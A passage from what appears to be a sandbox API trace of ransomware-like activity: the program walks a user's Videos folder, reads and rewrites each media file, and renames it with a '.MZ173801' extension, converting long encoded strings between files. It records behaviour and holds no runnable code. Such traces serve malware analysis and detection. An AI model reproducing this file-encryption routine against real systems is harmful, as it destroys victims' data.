lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0121.064] GetCurrentThreadId () returned 0x1358 [0121.064] GetCurrentThreadId () returned 0x1358 [0121.064] GetCurrentThreadId () returned 0x1358 [0121.065] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\_C-ZbiqZ3CWgavc2\\JRD90ylj1Dg_Ngx4FKM.flv" (normalized: "c:\\users\\fd1hvy\\videos\\_c-zbiqz3cwgavc2\\jrd90ylj1dg_ngx4fkm.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0121.065] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0121.065] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0121.065] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x635c [0121.065] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0121.065] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x635c, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x635c, lpOverlapped=0x0) returned 1 [0121.066] CloseHandle (hObject=0x3d0) returned 1 [0121.066] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\_C-ZbiqZ3CWgavc2\\JRD90ylj1Dg_Ngx4FKM.flv" (normalized: "c:\\users\\fd1hvy\\videos\\_c-zbiqz3cwgavc2\\jrd90ylj1dg_ngx4fkm.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0121.067] WriteFile (in: hFile=0x3d0, lpBuffer=0x2439b60*, nNumberOfBytesToWrite=0x635c, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x2439b60*, lpNumberOfBytesWritten=0x19f6f0*=0x635c, lpOverlapped=0x0) returned 1 [0121.069] CloseHandle (hObject=0x3d0) returned 1 [0121.070] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\_C-ZbiqZ3CWgavc2\\JRD90ylj1Dg_Ngx4FKM.flv" (normalized: "c:\\users\\fd1hvy\\videos\\_c-zbiqz3cwgavc2\\jrd90ylj1dg_ngx4fkm.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\_C-ZbiqZ3CWgavc2\\JRD90ylj1Dg_Ngx4FKM.flv.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\_c-zbiqz3cwgavc2\\jrd90ylj1dg_ngx4fkm.flv.mz173801")) returned 1 [0121.071] GetCurrentThreadId () returned 0x1358 [0121.071] GetCurrentThreadId () returned 0x1358 [0121.071] GetCurrentThreadId () returned 0x1358 [0121.071] GetCurrentThreadId () returned 0x1358 [0121.071] GetCurrentThreadId () returned 0x1358 [0121.071] GetCurrentThreadId () returned 0x1358 [0121.071] FindNextFileW (in: hFindFile=0xa1bab8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x630a5ba0, ftCreationTime.dwHighDateTime=0x1d5e336, ftLastAccessTime.dwLowDateTime=0xcc8a0140, ftLastAccessTime.dwHighDateTime=0x1d5ed84, ftLastWriteTime.dwLowDateTime=0xcc8a0140, ftLastWriteTime.dwHighDateTime=0x1d5ed84, nFileSizeHigh=0x0, nFileSizeLow=0x18422, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="o9cam2.swf", cAlternateFileName="")) returned 1 [0121.071] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0121.071] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0121.071] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\_C-ZbiqZ3CWgavc2\\o9cam2.swf" (normalized: "c:\\users\\fd1hvy\\videos\\_c-zbiqz3cwgavc2\\o9cam2.swf"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x630a5ba0, ftCreationTime.dwHighDateTime=0x1d5e336, ftLastAccessTime.dwLowDateTime=0xcc8a0140, ftLastAccessTime.dwHighDateTime=0x1d5ed84, ftLastWriteTime.dwLowDateTime=0xcc8a0140, ftLastWriteTime.dwHighDateTime=0x1d5ed84, nFileSizeHigh=0x0, nFileSizeLow=0x18422)) returned 1 [0121.071] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.071] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0121.072] GetCurrentThreadId () returned 0x1358 [0121.072] GetCurrentThreadId () returned 0x1358 [0121.072] GetCurrentThreadId () returned 0x1358 [0121.072] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.072] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0121.072] GetCurrentThreadId () returned 0x1358 [0121.073] GetCurrentThreadId () returned 0x1358 [0121.073] GetCurrentThreadId () returned 0x1358 [0121.073] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\_C-ZbiqZ3CWgavc2\\o9cam2.swf" (normalized: "c:\\users\\fd1hvy\\videos\\_c-zbiqz3cwgavc2\\o9cam2.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0121.073] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0121.073] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0121.073] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x18422 [0121.073] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0121.073] ReadFile (in: hFile=0x3d0, lpBuffer=0x23a47a0, nNumberOfBytesToRead=0x18422, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesRead=0x19f6e4*=0x18422, lpOverlapped=0x0) returned 1 [0121.074] CloseHandle (hObject=0x3d0) returned 1 [0121.076] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\_C-ZbiqZ3CWgavc2\\o9cam2.swf" (normalized: "c:\\users\\fd1hvy\\videos\\_c-zbiqz3cwgavc2\\o9cam2.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0121.077] WriteFile (in: hFile=0x3d0, lpBuffer=0x23be7d0*, nNumberOfBytesToWrite=0x18422, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23be7d0*, lpNumberOfBytesWritten=0x19f6f0*=0x18422, lpOverlapped=0x0) returned 1 [0121.080] CloseHandle (hObject=0x3d0) returned 1 [0121.083] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\_C-ZbiqZ3CWgavc2\\o9cam2.swf" (normalized: "c:\\users\\fd1hvy\\videos\\_c-zbiqz3cwgavc2\\o9cam2.swf"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\_C-ZbiqZ3CWgavc2\\o9cam2.swf.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\_c-zbiqz3cwgavc2\\o9cam2.swf.mz173801")) returned 1 [0121.083] GetCurrentThreadId () returned 0x1358 [0121.083] GetCurrentThreadId () returned 0x1358 [0121.083] GetCurrentThreadId () returned 0x1358 [0121.083] GetCurrentThreadId () returned 0x1358 [0121.083] GetCurrentThreadId () returned 0x1358 [0121.083] GetCurrentThreadId () returned 0x1358 [0121.083] FindNextFileW (in: hFindFile=0xa1bab8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd34e5a0, ftCreationTime.dwHighDateTime=0x1d5f0ca, ftLastAccessTime.dwLowDateTime=0xa590e870, ftLastAccessTime.dwHighDateTime=0x1d5e851, ftLastWriteTime.dwLowDateTime=0xa590e870, ftLastWriteTime.dwHighDateTime=0x1d5e851, nFileSizeHigh=0x0, nFileSizeLow=0x1855, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="OBs8J_Fu4-ilYu.flv", cAlternateFileName="OBS8J_~1.FLV")) returned 1 [0121.083] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0121.083] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0121.083] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\_C-ZbiqZ3CWgavc2\\OBs8J_Fu4-ilYu.flv" (normalized: "c:\\users\\fd1hvy\\videos\\_c-zbiqz3cwgavc2\\obs8j_fu4-ilyu.flv"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd34e5a0, ftCreationTime.dwHighDateTime=0x1d5f0ca, ftLastAccessTime.dwLowDateTime=0xa590e870, ftLastAccessTime.dwHighDateTime=0x1d5e851, ftLastWriteTime.dwLowDateTime=0xa590e870, ftLastWriteTime.dwHighDateTime=0x1d5e851, nFileSizeHigh=0x0, nFileSizeLow=0x1855)) returned 1 [0121.084] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.084] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 